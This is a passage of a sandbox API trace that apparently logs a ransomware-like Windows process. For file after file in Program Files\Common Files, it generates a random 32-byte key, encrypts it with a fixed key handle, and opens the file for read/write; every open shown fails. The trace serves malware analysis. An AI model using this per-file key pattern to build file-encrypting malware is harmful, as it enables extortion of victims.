dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.504] GetProcessHeap () returned 0x2c0000 [0122.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0122.504] GetProcessHeap () returned 0x2c0000 [0122.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbf498 | out: hHeap=0x2c0000) returned 1 [0122.507] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf8c8 | out: pbBuffer=0x25cf8c8) returned 1 [0122.507] GetProcessHeap () returned 0x2c0000 [0122.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0122.507] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf8c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf8c0*=0x30) returned 1 [0122.507] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSLoc.dll" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\msttsloc.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.510] GetProcessHeap () returned 0x2c0000 [0122.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0122.510] GetProcessHeap () returned 0x2c0000 [0122.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9c40 | out: hHeap=0x2c0000) returned 1 [0122.510] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf8c8 | out: pbBuffer=0x25cf8c8) returned 1 [0122.510] GetProcessHeap () returned 0x2c0000 [0122.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0122.511] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf8c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf8c0*=0x30) returned 1 [0122.511] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSEngine.dll" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\msttsengine.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.511] GetProcessHeap () returned 0x2c0000 [0122.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0122.511] GetProcessHeap () returned 0x2c0000 [0122.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecbed8 | out: hHeap=0x2c0000) returned 1 [0122.511] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf8c0 | out: pbBuffer=0x25cf8c0) returned 1 [0122.511] GetProcessHeap () returned 0x2c0000 [0122.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0122.511] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf8b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf8b8*=0x30) returned 1 [0122.511] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSDecWrp.dll" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\msttsdecwrp.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.511] GetProcessHeap () returned 0x2c0000 [0122.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0122.512] GetProcessHeap () returned 0x2c0000 [0122.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecbde0 | out: hHeap=0x2c0000) returned 1 [0122.512] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf8c0 | out: pbBuffer=0x25cf8c0) returned 1 [0122.512] GetProcessHeap () returned 0x2c0000 [0122.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0122.512] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf8b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf8b8*=0x30) returned 1 [0122.512] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSCommon.dll" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\msttscommon.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.512] GetProcessHeap () returned 0x2c0000 [0122.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0122.512] GetProcessHeap () returned 0x2c0000 [0122.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e4c730 | out: hHeap=0x2c0000) returned 1 [0122.512] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf8b8 | out: pbBuffer=0x25cf8b8) returned 1 [0122.512] GetProcessHeap () returned 0x2c0000 [0122.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0122.512] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf8b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf8b0*=0x30) returned 1 [0122.513] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSLoc.dll.mui" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\msttsloc.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.513] GetProcessHeap () returned 0x2c0000 [0122.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0122.513] GetProcessHeap () returned 0x2c0000 [0122.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e4e710 | out: hHeap=0x2c0000) returned 1 [0122.513] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf8b0 | out: pbBuffer=0x25cf8b0) returned 1 [0122.513] GetProcessHeap () returned 0x2c0000 [0122.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0122.513] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf8a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf8a8*=0x30) returned 1 [0122.513] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSFrontendENU.dll" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\msttsfrontendenu.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.513] GetProcessHeap () returned 0x2c0000 [0122.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0122.513] GetProcessHeap () returned 0x2c0000 [0122.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec8240 | out: hHeap=0x2c0000) returned 1 [0122.515] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf8a8 | out: pbBuffer=0x25cf8a8) returned 1 [0122.515] GetProcessHeap () returned 0x2c0000 [0122.515] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0122.515] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf8a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf8a0*=0x30) returned 1 [0122.515] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.WIH" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\m1033dsk.wih"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.529] GetProcessHeap () returned 0x2c0000 [0122.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0122.529] GetProcessHeap () returned 0x2c0000 [0122.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec8010 | out: hHeap=0x2c0000) returned 1 [0122.529] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf8a8 | out: pbBuffer=0x25cf8a8) returned 1 [0122.529] GetProcessHeap () returned 0x2c0000 [0122.529] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0122.529] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf8a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf8a0*=0x30) returned 1 [0122.529] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\adcvbs.inc" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\adcvbs.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.530] GetProcessHeap () returned 0x2c0000 [0122.530] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0122.530] GetProcessHeap () returned 0x2c0000 [0122.530] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbff88 | out: hHeap=0x2c0000) returned 1 [0122.530] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf8a0 | out: pbBuffer=0x25cf8a0) returned 1 [0122.531] GetProcessHeap () returned 0x2c0000 [0122.531] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0122.531] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf898*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf898*=0x30) returned 1 [0122.531] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\adcjavas.inc" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\adcjavas.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.531] GetProcessHeap () returned 0x2c0000 [0122.531] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0122.532] GetProcessHeap () returned 0x2c0000 [0122.532] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e03678 | out: hHeap=0x2c0000) returned 1 [0122.532] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf8a0 | out: pbBuffer=0x25cf8a0) returned 1 [0122.532] GetProcessHeap () returned 0x2c0000 [0122.532] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0122.532] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf898*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf898*=0x30) returned 1 [0122.532] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\DirectDB.dll" (normalized: "c:\\program files (x86)\\common files\\system\\directdb.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.544] GetProcessHeap () returned 0x2c0000 [0122.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0122.544] GetProcessHeap () returned 0x2c0000 [0122.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5f400 | out: hHeap=0x2c0000) returned 1 [0122.544] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf898 | out: pbBuffer=0x25cf898) returned 1 [0122.544] GetProcessHeap () returned 0x2c0000 [0122.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0122.544] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf890*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf890*=0x30) returned 1 [0122.544] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado28.tlb" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msado28.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.552] GetProcessHeap () returned 0x2c0000 [0122.552] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0122.552] GetProcessHeap () returned 0x2c0000 [0122.552] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbfa10 | out: hHeap=0x2c0000) returned 1 [0122.552] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf898 | out: pbBuffer=0x25cf898) returned 1 [0122.552] GetProcessHeap () returned 0x2c0000 [0122.553] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0122.553] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf890*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf890*=0x30) returned 1 [0122.553] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdaprst.dll" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msdaprst.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.560] GetProcessHeap () returned 0x2c0000 [0122.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0122.574] GetProcessHeap () returned 0x2c0000 [0122.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e039b8 | out: hHeap=0x2c0000) returned 1 [0122.575] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf890 | out: pbBuffer=0x25cf890) returned 1 [0122.575] GetProcessHeap () returned 0x2c0000 [0122.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0122.575] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf888*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf888*=0x30) returned 1 [0122.575] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\en-US\\msaddsr.dll.mui" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\en-us\\msaddsr.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.597] GetProcessHeap () returned 0x2c0000 [0122.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0122.597] GetProcessHeap () returned 0x2c0000 [0122.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee4a90 | out: hHeap=0x2c0000) returned 1 [0122.597] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf890 | out: pbBuffer=0x25cf890) returned 1 [0122.597] GetProcessHeap () returned 0x2c0000 [0122.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0122.597] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf888*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf888*=0x30) returned 1 [0122.597] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\sqlxmlx.rll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\sqlxmlx.rll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.600] GetProcessHeap () returned 0x2c0000 [0122.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0122.600] GetProcessHeap () returned 0x2c0000 [0122.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e04518 | out: hHeap=0x2c0000) returned 1 [0122.600] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf888 | out: pbBuffer=0x25cf888) returned 1 [0122.600] GetProcessHeap () returned 0x2c0000 [0122.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0122.600] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf880*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf880*=0x30) returned 1 [0122.600] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\sqloledb.rll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\sqloledb.rll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.600] GetProcessHeap () returned 0x2c0000 [0122.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0122.600] GetProcessHeap () returned 0x2c0000 [0122.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e04378 | out: hHeap=0x2c0000) returned 1 [0122.600] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf888 | out: pbBuffer=0x25cf888) returned 1 [0122.600] GetProcessHeap () returned 0x2c0000 [0122.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0122.600] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf880*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf880*=0x30) returned 1 [0122.600] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\sqloledb.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\sqloledb.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.601] GetProcessHeap () returned 0x2c0000 [0122.601] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0122.601] GetProcessHeap () returned 0x2c0000 [0122.601] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e042a8 | out: hHeap=0x2c0000) returned 1 [0122.601] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf880 | out: pbBuffer=0x25cf880) returned 1 [0122.601] GetProcessHeap () returned 0x2c0000 [0122.601] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0122.601] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf878*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf878*=0x30) returned 1 [0122.601] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\oledbvbs.inc" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\oledbvbs.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.601] GetProcessHeap () returned 0x2c0000 [0122.601] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0122.601] GetProcessHeap () returned 0x2c0000 [0122.601] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e041d8 | out: hHeap=0x2c0000) returned 1 [0122.601] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf880 | out: pbBuffer=0x25cf880) returned 1 [0122.601] GetProcessHeap () returned 0x2c0000 [0122.601] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0122.601] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf878*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf878*=0x30) returned 1 [0122.601] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\oledbjvs.inc" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\oledbjvs.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.602] GetProcessHeap () returned 0x2c0000 [0122.602] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0122.602] GetProcessHeap () returned 0x2c0000 [0122.602] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e04108 | out: hHeap=0x2c0000) returned 1 [0122.602] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf878 | out: pbBuffer=0x25cf878) returned 1 [0122.602] GetProcessHeap () returned 0x2c0000 [0122.602] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0122.602] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf870*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf870*=0x30) returned 1 [0122.602] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\oledb32r.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\oledb32r.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.604] GetProcessHeap () returned 0x2c0000 [0122.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0122.604] GetProcessHeap () returned 0x2c0000 [0122.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e04038 | out: hHeap=0x2c0000) returned 1 [0122.604] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf878 | out: pbBuffer=0x25cf878) returned 1 [0122.604] GetProcessHeap () returned 0x2c0000 [0122.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0122.604] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf870*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf870*=0x30) returned 1 [0122.604] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msxactps.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msxactps.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.604] GetProcessHeap () returned 0x2c0000 [0122.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0122.604] GetProcessHeap () returned 0x2c0000 [0122.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e03e98 | out: hHeap=0x2c0000) returned 1 [0122.604] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf870 | out: pbBuffer=0x25cf870) returned 1 [0122.604] GetProcessHeap () returned 0x2c0000 [0122.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0122.604] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf868*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf868*=0x30) returned 1 [0122.604] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaurl.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdaurl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.605] GetProcessHeap () returned 0x2c0000 [0122.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0122.605] GetProcessHeap () returned 0x2c0000 [0122.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e03dc8 | out: hHeap=0x2c0000) returned 1 [0122.605] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf870 | out: pbBuffer=0x25cf870) returned 1 [0122.605] GetProcessHeap () returned 0x2c0000 [0122.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0122.605] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf868*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf868*=0x30) returned 1 [0122.605] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole 